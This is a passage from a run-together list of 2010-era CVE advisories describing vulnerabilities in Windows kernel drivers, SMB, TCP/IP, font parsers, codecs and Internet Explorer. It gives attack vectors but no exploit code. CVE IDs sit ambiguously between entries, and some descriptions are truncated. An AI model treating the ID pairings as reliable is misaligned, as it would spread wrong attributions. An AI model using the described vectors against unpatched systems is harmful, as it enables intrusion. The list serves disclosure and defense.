drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 do not properly manage a window class, which allows local users to gain privileges by creating a window, then using (1) the SetWindowLongPtr function to modify the popup menu structure, or (2) the SwitchWndProc function with a switch window information pointer, which is not re-initialized when a WM_NCCREATE message is processed, aka "Win32k Window Class Vulnerability." [CVE-2010-2743] The kernel-mode drivers in Microsoft Windows XP SP3 do not properly perform indexing of a function-pointer table during the loading of keyboard layouts from disk, which allows local users to gain privileges via a crafted application, as demonstrated in the wild in July 2010 by the Stuxnet worm, aka "Win32k Keyboard Layout Vulnerability." NOTE: this might be a duplicate of CVE-2010-3888 or CVE-2010-3889. [CVE-2010-2741] The OpenType Font (OTF) format driver in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 performs an incorrect integer calculation during font processing, which allows local users to gain privileges via a crafted application, aka "OpenType Font Validation Vulnerability." [CVE-2010-2740] The OpenType Font (OTF) format driver in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly perform memory allocation during font parsing, which allows local users to gain privileges via a crafted application, aka "OpenType Font Parsing Vulnerability." [CVE-2010-2739] Buffer overflow in the CreateDIBPalette function in win32k.sys in Microsoft Windows XP SP3, Server 2003 R2 Enterprise SP2, Vista Business SP1, Windows 7, and Server 2008 SP2 allows local users to cause a denial of service (crash) and possibly execute arbitrary code by performing a clipboard operation (GetClipboardData API function) with a crafted bitmap with a palette that contains a large number of colors. [CVE-2010-2738] The Uniscribe (aka new Unicode Script Processor) implementation in USP10.DLL in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2, and Microsoft Office XP SP3, 2003 SP3, and 2007 SP2, does not properly validate tables associated with malformed OpenType fonts, which allows remote attackers to execute arbitrary code via a crafted (1) web site or (2) Office document, aka "Uniscribe Font Parsing Engine Memory Corruption Vulnerability." [CVE-2010-2731] Unspecified vulnerability in Microsoft Internet Information Services (IIS) 5.1 on Windows XP SP3, when directory-based Basic Authentication is enabled, allows remote attackers to bypass intended access restrictions and execute ASP files via a crafted request, aka "Directory Authentication Bypass Vulnerability." [CVE-2010-2568] Windows Shell in Microsoft Windows XP SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 SP2 and R2, and Windows 7 allows local users or remote attackers to execute arbitrary code via a crafted (1) .LNK or (2) .PIF shortcut file, which is not properly handled during icon display in Windows Explorer, as demonstrated in the wild in July 2010, and originally reported for malware that leverages CVE-2010-2772 in Siemens WinCC SCADA systems. [CVE-2010-2566] The Secure Channel (aka SChannel) security package in Microsoft Windows XP SP2 and SP3, and Windows Server 2003 SP2, does not properly validate certificate request messages from TLS and SSL servers, which allows remote servers to execute arbitrary code via a crafted SSL response, aka "SChannel Malformed Certificate Request Remote Code Execution Vulnerability." [CVE-2010-2564] Buffer overflow in Microsoft Windows Movie Maker (WMM) 2.1, 2.6, and 6.0 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted project file, aka "Movie Maker Memory Corruption Vulnerability." [CVE-2010-2563] The Word 97 text converter in the WordPad Text Converters in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly parse malformed structures in Word 97 documents, which allows remote attackers to execute arbitrary code via a crafted document containing an unspecified value that is used in a loop counter, aka "WordPad Word 97 Text Converter Memory Corruption Vulnerability." [CVE-2010-2555] The Tracing Feature for Services in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly determine the length of strings in the registry, which allows local users to gain privileges or cause a denial of service (memory corruption) via vectors involving a long string, aka "Tracing Memory Corruption Vulnerability." [CVE-2010-2554] The Tracing Feature for Services in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 has incorrect ACLs on its registry keys, which allows local users to gain privileges via vectors involving a named pipe and impersonation, aka "Tracing Registry Key ACL Vulnerability." [CVE-2010-2553] The Cinepak codec in Microsoft Windows XP SP2 and SP3, Windows Vista SP1 and SP2, and Windows 7 does not properly decompress media files, which allows remote attackers to execute arbitrary code via a crafted file, aka "Cinepak Codec Decompression Vulnerability." [CVE-2010-2552] Stack consumption vulnerability in the SMB Server in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows remote attackers to cause a denial of service (system hang) via a malformed SMBv2 compounded request, aka "SMB Stack Exhaustion Vulnerability." [CVE-2010-2551] The SMB Server in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate an internal variable in an SMB packet, which allows remote attackers to cause a denial of service (system hang) via a crafted (1) SMBv1 or (2) SMBv2 packet, aka "SMB Variable Validation Vulnerability." [CVE-2010-2550] The SMB Server in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate fields in an SMB request, which allows remote attackers to execute arbitrary code via a crafted SMB packet, aka "SMB Pool Overflow Vulnerability." [CVE-2010-2549] Use-after-free vulnerability in the kernel-mode drivers in Microsoft Windows Vista SP1 and SP2 and Server 2008 Gold and SP2 allows local users to gain privileges or cause a denial of service (system crash) by using a large number of calls to the NtUserCheckAccessForIntegrityLevel function to trigger a failure in the LockProcessByClientId function, leading to deletion of an in-use process object, aka "Win32k Reference Count Vulnerability." [CVE-2010-2265] Cross-site scripting (XSS) vulnerability in the GetServerName function in sysinfo/commonFunc.js in Microsoft Windows Help and Support Center for Windows XP and Windows Server 2003 allows remote attackers to inject arbitrary web script or HTML via the svr parameter to sysinfo/sysinfomain.htm. NOTE: this can be leveraged with CVE-2010-1885 to execute arbitrary commands without user interaction. [CVE-2010-2091] Microsoft Outlook Web Access (OWA) 8.2.254.0, when Internet Explorer 7 on Windows Server 2003 is used, does not properly handle the id parameter in a Folder IPF.Note action to the default URI, which might allow remote attackers to obtain sensitive information or conduct cross-site scripting (XSS) attacks via an invalid value. [CVE-2010-1898] The Common Language Runtime (CLR) in Microsoft .NET Framework 2.0 SP1, 2.0 SP2, 3.5, 3.5 SP1, and 3.5.1, and Microsoft Silverlight 2 and 3 before 3.0.50611.0 on Windows and before 3.0.41130.0 on Mac OS X, does not properly handle interfaces and delegations to virtual methods, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka "Microsoft Silverlight and Microsoft .NET Framework CLR Virtual Method Delegate Vulnerability." [CVE-2010-1897] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 do not properly validate pseudo-handle values in callback parameters during window creation, which allows local users to gain privileges via a crafted application, aka "Win32k Window Creation Vulnerability." [CVE-2010-1896] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, and Windows Server 2008 Gold and SP2 do not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "Win32k User Input Validation Vulnerability." [CVE-2010-1895] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, and Windows Server 2003 SP2, do not properly perform memory allocation before copying user-mode data to kernel mode, which allows local users to gain privileges via a crafted application, aka "Win32k Pool Overflow Vulnerability." [CVE-2010-1894] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, and Windows Server 2003 SP2, do not properly handle unspecified exceptions, which allows local users to gain privileges via a crafted application, aka "Win32k Exception Handling Vulnerability." [CVE-2010-1893] Integer overflow in the TCP/IP stack in Microsoft Windows Vista SP1, Windows Server 2008 Gold and R2, and Windows 7 allows local users to gain privileges via a buffer of user-mode data that is copied to kernel mode, aka "Integer Overflow in Windows Networking Vulnerability." [CVE-2010-1892] The TCP/IP stack in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly handle malformed IPv6 packets, which allows remote attackers to cause a denial of service (system hang) via multiple crafted packets, aka "IPv6 Memory Corruption Vulnerability." [CVE-2010-1891] The Client/Server Runtime Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2, when a Chinese, Japanese, or Korean locale is enabled, does not properly allocate memory for transactions, which allows local users to gain privileges via a crafted application, aka "CSRSS Local Elevation of Privilege Vulnerability." [CVE-2010-1890] The kernel in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate ACLs on kernel objects, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Improper Validation Vulnerability." [CVE-2010-1889] Double free vulnerability in the kernel in Microsoft Windows Vista SP1 and SP2, and Windows Server 2008 Gold and SP2, allows local users to gain privileges via a crafted application, related to object initialization during error handling, aka "Windows Kernel Double Free Vulnerability." [CVE-2010-1888] Race condition in the kernel in Microsoft Windows XP SP3 allows local users to gain privileges via vectors involving thread creation, aka "Windows Kernel Data Initialization Vulnerability." [CVE-2010-1887] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 do not properly validate an unspecified system-call argument, which allows local users to cause a denial of service (system hang) via a crafted application, aka "Win32k Bounds Checking Vulnerability." [CVE-2010-1886] Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 SP2 and R2, and Windows 7 allow local users to gain privileges by leveraging access to a process with NetworkService credentials, as demonstrated by TAPI Server, SQL Server, and IIS processes, and related to the Windows Service Isolation feature. NOTE: the vendor states that privilege escalation from NetworkService to LocalSystem does not cross a "security boundary." [CVE-2010-1885] The MPC::HexToNum function in helpctr.exe in Microsoft Windows Help and Support Center in Windows XP and Windows Server 2003 does not properly handle malformed escape sequences, which allows remote attackers to bypass the trusted documents whitelist (fromHCP option) and execute arbitrary commands via a crafted hcp:// URL, aka "Help Center URL Validation Vulnerability." [CVE-2010-1883] Integer overflow in the Embedded OpenType (EOT) Font Engine in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows remote attackers to execute arbitrary code via a crafted table in an embedded font, aka "Embedded OpenType Font Integer Overflow Vulnerability." [CVE-2010-1882] Multiple buffer overflows in the MPEG Layer-3 Audio Codec for Microsoft DirectShow in l3codecx.ax in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allow remote attackers to execute arbitrary code via an MPEG Layer-3 audio stream in (1) a crafted media file or (2) crafted streaming content, aka "MPEG Layer-3 Audio Decoder Buffer Overflow Vulnerability." [CVE-2010-1880] Unspecified vulnerability in Quartz.dll for DirectShow on Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1, and Server 2008 allows remote attackers to execute arbitrary code via a media file with crafted compression data, aka "MJPEG Media Decompression Vulnerability." [CVE-2010-1735] The SfnLOGONNOTIFY function in win32k.sys in the kernel in Microsoft Windows 2000, XP, and Server 2003 allows local users to cause a denial of service (system crash) via a 0x4c value in the second argument (aka the Msg argument) of a PostMessage function call for the DDEMLEvent window. [CVE-2010-1734] The SfnINSTRING function in win32k.sys in the kernel in Microsoft Windows 2000, XP, and Server 2003 allows local users to cause a denial of service (system crash) via a 0x18d value in the second argument (aka the Msg argument) of a PostMessage function call for the DDEMLEvent window. [CVE-2010-1690] The DNS implementation in smtpsvc.dll before 6.0.2600.5949 in Microsoft Windows 2000 SP4 and earlier, Windows XP SP3 and earlier, Windows Server 2003 SP2 and earlier, Windows Server 2008 SP2 and earlier, Windows Server 2008 R2, Exchange Server 2003 SP3 and earlier, Exchange Server 2007 SP2 and earlier, and Exchange Server 2010 does not verify that transaction IDs of responses match transaction IDs of queries, which makes it easier for man-in-the-middle attackers to spoof DNS responses, a different vulnerability than CVE-2010-0024 and CVE-2010-0025. [CVE-2010-1689] The DNS implementation in smtpsvc.dll before 6.0.2600.5949 in Microsoft Windows 2000 SP4 and earlier, Windows XP SP3 and earlier, Windows Server 2003 SP2 and earlier, Windows Server 2008 SP2 and earlier, Windows Server 2008 R2, Exchange Server 2003 SP3 and earlier, Exchange Server 2007 SP2 and earlier, and Exchange Server 2010 uses predictable transaction IDs that are formed by incrementing a previous ID by 1, which makes it easier for man-in-the-middle attackers to spoof DNS responses, a different vulnerability than CVE-2010-0024 and CVE-2010-0025. [CVE-2010-1264] Unspecified vulnerability in Microsoft Windows SharePoint Services 3.0 SP1 and SP2 allows remote attackers to cause a denial of service (hang) via crafted requests to the Help page that cause repeated restarts of the application pool, aka "Sharepoint Help Page Denial of Service Vulnerability." [CVE-2010-1263] Windows Shell and WordPad in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 [CVE-2010-1255] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 Gold and SP2, Windows 7, and Server 2008 R2 allows local users to execute arbitrary code via vectors related to "glyph outline information" and TrueType fonts, aka "Win32k TrueType Font Parsing Vulnerability." [CVE-2010-1225] The memory-management implementation in the Virtual Machine Monitor (aka VMM or hypervisor) in Microsoft Virtual PC 2007 Gold and SP1, Virtual Server 2005 Gold and R2 SP1, and Windows Virtual PC does not properly restrict access from the guest OS to memory locations in the VMM work area, which allows context-dependent attackers to bypass certain anti-exploitation protection mechanisms on the guest OS via crafted input to a vulnerable application. NOTE: the vendor reportedly found that only systems with an otherwise vulnerable application are affected, because "the memory areas accessible from the guest cannot be leveraged to achieve either remote code execution or elevation of privilege and ... no data from the host is exposed to the guest OS." [CVE-2010-1175] Microsoft Internet Explorer 7.0 on Windows XP and Windows Server 2003 allows remote attackers to have an unspecified impact via a certain XML document that references a crafted web site in the SRC attribute of an image element, related to a "0day Vulnerability." [CVE-2010-1118] Unspecified vulnerability in Internet Explorer 8 on Microsoft Windows 7 allows remote attackers to execute arbitrary code via unknown vectors, possibly related to a use-after-free issue, as demonstrated by Peter Vreugdenhil during a Pwn2Own competition at CanSecWest 2010. [CVE-2010-1117] Heap-based buffer overflow in Internet Explorer 8 on Microsoft Windows 7 allows remote attackers to discover the base address of a Windows .dll file, and possibly have unspecified other impact, via unknown vectors, as demonstrated by Peter Vreugdenhil during a Pwn2Own competition at CanSecWest 2010. [CVE-2010-1098] The ANI parser in Microsoft Windows before 7 on the x86 platform, as used in Internet Explorer and other applications, allows remote attackers to cause a denial of service (memory and CPU consumption) via a crafted biClrUsed value in the BITMAPINFO header of a .ANI file. [CVE-2010-1042] Microsoft Windows Media Player 11 does not properly perform colorspace conversion, which allows remote attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via a crafted .AVI file. NOTE: the provenance of this information is unknown [CVE-2010-0917] Stack-based buffer overflow in VBScript in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2, when Internet Explorer is used, might allow user-assisted remote attackers to execute arbitrary code via a long string in the fourth argument (aka helpfile argument) to the MsgBox function, leading to code execution when the F1 key is pressed, a different vulnerability than CVE-2010-0483. [CVE-2010-0820] Heap-based buffer overflow in the Local Security Authority Subsystem Service (LSASS), as used in Active Directory in Microsoft Windows Server 2003 SP2 and Windows Server 2008 Gold, SP2, and R2 [CVE-2010-0819] Unspecified vulnerability in the Windows OpenType Compact Font Format (CFF) driver in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 SP2 and R2, and Windows 7 allows local users to execute arbitrary code via unknown vectors related to improper validation when copying data from user mode to kernel mode, aka "OpenType CFF Font Driver Memory Corruption Vulnerability." [CVE-2010-0818] The MPEG-4 codec in the Windows Media codecs in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2 does not properly handle crafted media content with MPEG-4 video encoding, which allows remote attackers to execute arbitrary code via a file in an unspecified "supported format," aka "MPEG-4 Codec Vulnerability." [CVE-2010-0812] Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allow remote attackers to bypass intended IPv4 source-address restrictions via a mismatched IPv6 source address in a tunneled ISATAP packet, aka "ISATAP IPv6 Source Address Spoofing Vulnerability." [CVE-2010-0811] Multiple unspecified vulnerabilities in the Microsoft Internet Explorer 8 Developer Tools ActiveX control in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allow remote attackers to execute arbitrary code via unknown vectors that "corrupt the system state," aka "Microsoft Internet Explorer 8 Developer Tools Vulnerability." [CVE-2010-0810] The kernel in Microsoft Windows Vista Gold, SP1, and SP2, and Windows Server 2008 Gold and SP2, does not properly handle unspecified exceptions, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Exception Handler Vulnerability." [CVE-2010-0808] Microsoft Internet Explorer 6 and 7 on Windows XP and Vista does not prevent script from simulating user interaction with the AutoComplete feature, which allows remote attackers to obtain sensitive form information via a crafted web site, aka "AutoComplete Information Disclosure Vulnerability." [CVE-2010-0805] The Tabular Data Control (TDC) ActiveX control in Microsoft Internet Explorer 5.01 SP4, 6 on Windows XP SP2 and SP3, and 6 SP1 allows remote attackers to execute arbitrary code via a long URL (DataURL parameter) that triggers memory corruption in the CTDCCtl::SecurityCHeckDataURL function, aka "Memory Corruption Vulnerability." [CVE-2010-0719] An unspecified API in Microsoft Windows 2000, Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, and Windows 7 does not validate arguments, which allows local users to cause a denial of service (system crash) via a crafted application. [CVE-2010-0718] Buffer overflow in Microsoft Windows Media Player 9 and 11.0.5721.5145 allows remote attackers to cause a denial of service (divide-by-zero error and application crash) via a crafted .mpg file. [CVE-2010-0487] The Authenticode Signature verification functionality in cabview.dll in Cabinet File Viewer Shell Extension 5.1, 6.0, and 6.1 in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly use unspecified fields in a file digest, which allows remote attackers to execute arbitrary code via a modified cabinet (aka .CAB) file that incorrectly appears to have a valid signature, aka "Cabview Corruption Validation Vulnerability." [CVE-2010-0486] The WinVerifyTrust function in Authenticode Signature Verification 5.1, 6.0, and 6.1 in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly use unspecified fields in a file digest, which allows user-assisted remote attackers to execute arbitrary code via a modified (1) Portable Executable (PE) or (2) cabinet (aka .CAB) file that incorrectly appears to have a valid signature, aka "WinVerifyTrust Signature Validation Vulnerability." [CVE-2010-0485] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 Gold and SP2, Windows 7, and Server 2008 R2 "do not properly validate all callback parameters when creating a new window," which allows local users to execute arbitrary code, aka "Win32k Window Creation Vulnerability." [CVE-2010-0484] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2 "do not properly validate changes in certain kernel objects," which allows local users to execute arbitrary code via vectors related to Device Contexts (DC) and the GetDCEx function, aka "Win32k Improper Data Validation Vulnerability." [CVE-2010-0483] vbscript.dll in VBScript 5.1, 5.6, 5.7, and 5.8 in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2, when Internet Explorer is used, allows user-assisted remote attackers to execute arbitrary code by referencing a (1) local pathname, (2) UNC share pathname, or (3) WebDAV server with a crafted .hlp file in the fourth argument (aka helpfile argument) to the MsgBox function, leading to code execution involving winhlp32.exe when the F1 key is pressed, aka "VBScript Help Keypress Vulnerability." [CVE-2010-0482] The kernel in Microsoft Windows Server 2008 R2 and Windows 7 does not properly validate relocation sections of image files, which allows local users to cause a denial of service (reboot) via a crafted file, aka "Windows Kernel Malformed Image Vulnerability." [CVE-2010-0481] The kernel in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly translate a registry key's virtual path to its real path, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Virtual Path Parsing Vulnerability." [CVE-2010-0480] Multiple stack-based buffer overflows in the MPEG Layer-3 audio codecs in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allow remote attackers to execute arbitrary code via a crafted AVI file, aka "MPEG Layer-3 Audio Decoder Stack Overflow Vulnerability." [CVE-2010-0478] Stack-based buffer overflow in nsum.exe in the Windows Media Unicast Service in Media Services for Microsoft Windows 2000 Server SP4 allows remote attackers to execute arbitrary code via crafted packets associated with transport information, aka "Media Services Stack-based Buffer Overflow Vulnerability." [CVE-2010-0477] The SMB client in Microsoft Windows Server 2008 R2 and Windows 7 does not properly handle (1) SMBv1 and (2) SMBv2 response packets, which allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code via a crafted packet that causes the client to read the entirety of the response, and then improperly interact with the Winsock Kernel (WSK), aka "SMB Client Message Size Vulnerability." [CVE-2010-0476] The SMB client in Microsoft Windows Server 2003 SP2, Vista Gold, SP1, and SP2, and Windows Server 2008 Gold and SP2 allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and reboot) via a crafted SMB transaction response that uses (1) SMBv1 or (2) SMBv2, aka "SMB Client Response Parsing Vulnerability." [CVE-2010-0379] Multiple unspecified vulnerabilities in the Macromedia Flash ActiveX control in Adobe Flash Player 6, as distributed in Microsoft Windows XP SP2 and SP3, might allow remote attackers to execute arbitrary code via unspecified vectors that are not related to the use-after-free "Movie Unloading Vulnerability" (CVE-2010-0378). NOTE: due to lack of details, it is not clear whether this overlaps any other CVE item. [CVE-2010-0378] Use-after-free vulnerability in Adobe Flash Player 6.0.79, as distributed in Microsoft Windows XP SP2 and SP3, allows remote attackers to execute arbitrary code by unloading a Flash object that is currently being accessed by a script, leading to memory corruption, aka a "Movie Unloading Vulnerability." [CVE-2010-0278] A certain ActiveX control in msgsc.14.0.8089.726.dll in Microsoft Windows Live Messenger 2009 build 14.0.8089.726 on Windows Vista and Windows 7 allows remote attackers to cause a denial of service (msnmsgr.exe crash) by calling the ViewProfile method with a crafted argument during an MSN Messenger session. [CVE-2010-0270] The SMB client in Microsoft Windows Server 2008 R2 and Windows 7 does not properly validate fields in SMB transaction responses, which allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and reboot) via a crafted (1) SMBv1 or (2) SMBv2 response, aka "SMB Client Transaction Vulnerability." [CVE-2010-0269] The SMB client in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly allocate memory for SMB responses, which allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code via a crafted (1) SMBv1 or (2) SMBv2 response, aka "SMB Client Memory Allocation Vulnerability." [CVE-2010-0268] Unspecified vulnerability in the Windows Media Player ActiveX control in Windows Media Player (WMP) 9 on Microsoft Windows 2000 SP4 and XP SP2 and SP3 allows remote attackers to execute arbitrary code via crafted media content, aka "Media Player Remote Code Execution Vulnerability." [CVE-2010-0265] Buffer overflow in Microsoft Windows Movie Maker 2.1, 2.6, and 6.0, and Microsoft Producer 2003, allows remote attackers to execute arbitrary code via a crafted project (.MSWMM) file, aka "Movie Maker and Producer Buffer Overflow Vulnerability." [CVE-2010-0252] The Microsoft Data Analyzer ActiveX control (aka the Office Excel ActiveX control for Data Analysis) in max3activex.dll in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows remote attackers to execute arbitrary code via a crafted web page that corrupts the "system state," aka "Microsoft Data Analyzer ActiveX Control Vulnerability." [CVE-2010-0250] Heap-based buffer overflow in DirectShow in Microsoft DirectX, as used in the AVI Filter on Windows 2000 SP4, Windows XP SP2 and SP3, and Windows Server 2003 SP2, and in Quartz on Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, allows remote attackers to execute arbitrary code via an AVI file with a crafted length field in an unspecified video stream, which is not properly handled by the RLE video decompressor, aka "DirectShow Heap Overflow Vulnerability." [CVE-2010-0249] Use-after-free vulnerability in Microsoft Internet Explorer 6, 6 SP1, 7, and 8 on Windows 2000 SP4 [CVE-2010-0242] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 allows remote attackers to cause a denial of service (system hang) via crafted packets with malformed TCP selective acknowledgement (SACK) values, aka "TCP/IP Selective Acknowledgement Vulnerability." [CVE-2010-0241] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2, when IPv6 is enabled, does not properly perform bounds checking on ICMPv6 Route Information packets, which allows remote attackers to execute arbitrary code via crafted packets, aka "ICMPv6 Route Information Vulnerability." [CVE-2010-0240] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2, when a custom network driver is used, does not properly handle local fragmentation of Encapsulating Security Payload (ESP) over UDP packets, which allows remote attackers to execute arbitrary code via crafted packets, aka "Header MDL Fragmentation Vulnerability." [CVE-2010-0239] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2, when IPv6 is enabled, does not properly perform bounds checking on ICMPv6 Router Advertisement packets, which allows remote attackers to execute arbitrary code via crafted packets, aka "ICMPv6 Router Advertisement Vulnerability." [CVE-2010-0238] Unspecified vulnerability in registry-key validation in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Vista Gold allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Registry Key Vulnerability." [CVE-2010-0237] The kernel in Microsoft Windows 2000 SP4 and XP SP2 and SP3 allows local users to gain privileges by creating a symbolic link from an untrusted registry hive to a trusted registry hive, aka "Windows Kernel Symbolic Link Creation Vulnerability." [CVE-2010-0236] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Vista Gold does not properly allocate memory for the destination key associated with a symbolic-link registry key, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Memory Allocation Vulnerability." [CVE-2010-0235] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Vista Gold does not perform the expected validation before creating a symbolic link, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Symbolic Link Value Vulnerability." [CVE-2010-0234] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 does not properly validate a registry-key argument to an unspecified system call, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Null Pointer Vulnerability." [CVE-2010-0233] Double free vulnerability in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows local users to gain privileges via a crafted application, aka "Windows Kernel Double Free Vulnerability." [CVE-2010-0232] The kernel in Microsoft Windows NT 3.1 through Windows 7, including Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, and Windows Server 2008 Gold and SP2, when access to 16-bit applications is enabled on a 32-bit x86 platform, does not properly validate certain BIOS calls, which allows local users to gain privileges by crafting a VDM_TIB data structure in the Thread Environment Block (TEB), and then calling the NtVdmControl function to start the Windows Virtual DOS Machine (aka NTVDM) subsystem, leading to improperly handled exceptions involving the #GP trap handler (nt!KiTrap0D), aka "Windows Kernel Exception Handler Vulnerability." [CVE-2010-0231] The SMB implementation in the Server service in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not use a sufficient source of entropy, which allows remote attackers to obtain access to files and other SMB resources via a large number of authentication requests, related to server-generated challenges, certain "duplicate values," and spoofing of an authentication token, aka "SMB NTLM Authentication Lack of Entropy Vulnerability." [CVE-2010-0035] The Key Distribution Center (KDC) in Kerberos in Microsoft Windows 2000 SP4, Server 2003 SP2, and Server 2008 Gold and SP2, when a trust relationship with a non-Windows Kerberos realm exists, allows remote authenticated users to cause a denial of service (NULL pointer dereference and domain controller outage) via a crafted Ticket Granting Ticket (TGT) renewal request, aka "Kerberos Null Pointer Dereference Vulnerability." [CVE-2010-0028] Integer overflow in Microsoft Paint in Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via a crafted JPEG (.JPG) file, aka "MS Paint Integer Overflow Vulnerability." [CVE-2010-0027] The URL validation functionality in Microsoft Internet Explorer 5.01, 6, 6 SP1, 7 and 8, and the ShellExecute API function in Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2, does not properly process input parameters, which allows remote attackers to execute arbitrary local programs via a crafted URL, aka "URL Validation Vulnerability." [CVE-2010-0026] 